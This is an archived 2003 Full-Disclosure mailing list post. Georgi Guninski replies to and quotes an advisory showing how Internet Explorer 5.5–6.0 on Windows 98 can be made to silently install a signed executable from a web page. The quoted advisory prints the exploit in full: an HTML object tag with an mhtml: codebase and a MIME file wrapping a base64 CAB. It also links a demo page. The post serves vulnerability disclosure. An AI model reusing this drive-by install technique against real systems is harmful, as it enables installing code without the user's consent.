| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: guninski at guninski.com (Georgi Guninski) Subject: SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0 Has the users at microsoft fixed reinstalling of bugware signed by them? outlctl.dll (amongst other stuff) used to be a disguised frontend to cmd.exe and was quite signed. IIRC at a time microsoft even wrote in a security bulletin: "remove us from the trusted publishers in exploder" - has this changed, i.e. are they *now* claiming they are a trusthworthy publisher again? Georgi http-equiv@...ite.com wrote: > Sunday, May 4, 2003 > > > Silent delivery and installation of an executable on the target > machine, default install of win98 and Internet Explorer with all > patches to date. No client input other than viewing a web page: > > Mildly amused by the recent patching of the codebase saga spanning > nearly 3 years now, we put on our thinking caps and come to the very > simple, yet delicious conclusion: > > As below we are able to inject arbitrary html into the local computer > zone thus bypassing the browser's security. Nevertheless the codebase > exploits as detailed time and time again, now no longer function, > returning the standard active x error or security warning. > > BUT ! > > there is a very specific reason for that and to bypass it, we do like > so: > > ----local.html---- > > <object CLASSID="CLSID:55555555-5555" > codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt! > File://malware.cab"> > > ----local.html---- > > and where our: > > ---wecerr.txt--- > MIME-Version: 1.0 > Content-Location:File://malware.cab > Content-Transfer-Encoding: base64 > > TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAA > AAAAAA > > ---wecerr.txt--- > > contains a "signed" cab file. The digital signature is our key. > > Provided the executable is signed, we are again able to install via > the codebase object, from the local machine and without any prompts > or warnings. Certainly we would not expect malware to be digitally > signed out in the wild, but for what it is worth, we are back in > business. > > Working Example > > http://www.malware.com/aha.html > > Caution: > > a) for demonstration purposes we use the ubiquitous flash file [.cab > file] as it is both signed and benign and you are able to visually > see the install: > > [screen shot: http://www.malware.com/aha.png 14KB] > > b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can > take a short while to download: > > [screen shot: http://www.malware.com/ah.png 4KB] > > once downloaded, simply take the: > > ----local.html---- > > <object CLASSID="CLSID:55555555-5555" > codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt! > File://malware.cab"> > > ----local.html---- > > and away you go. > > Notes: > > 1. None > > End Call >
Powered by blists - more mailing lists